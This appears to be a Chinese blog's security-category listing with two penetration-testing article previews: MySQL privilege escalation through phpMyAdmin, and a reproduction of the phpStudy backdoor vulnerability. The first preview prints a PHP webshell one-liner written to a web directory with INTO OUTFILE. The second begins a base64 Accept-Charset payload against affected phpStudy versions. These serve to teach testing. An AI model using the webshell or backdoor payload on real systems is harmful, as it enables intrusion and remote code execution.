安全
关注
分享
扫一扫
文章平均质量分 54
L_{ROOT}
.
展开
-
渗透测试Mysql提权
**Mysql 提权**phpmyadmin篇利用条件:有足够权限“secure_file_priv” 对应的值不能为空且必须默认网站路径 利用过程: 查询:SHOW VARIABLES LIKE "secure_file_priv" 默认网站路径 selcet'<?php @eval($_REQUEST[7]);?>'INTO OUTFILE 'C:\\phpStudy\\PHPTutoria\\WWW\\5.php'原创 2023-07-27 11:03:28 · 138 阅读 · 0 评论 -
phpstudy后门漏洞复现
phpstudy后门漏洞复现##漏洞危害高危漏洞描述攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门影响版本phpstudy 2016版 php-5.4phpstudy 2018版 php-5.2.17phpstudy 2018版 php-5.4.45工具准备phpsudy2016 -phpstudy2018brup漏洞复现访问phpinfo页面使用brup 抓住当前页面包放入 Repeater模块中利用代码Accept-charset: c3lzd原创 2023-07-27 11:03:38 · 284 阅读 · 0 评论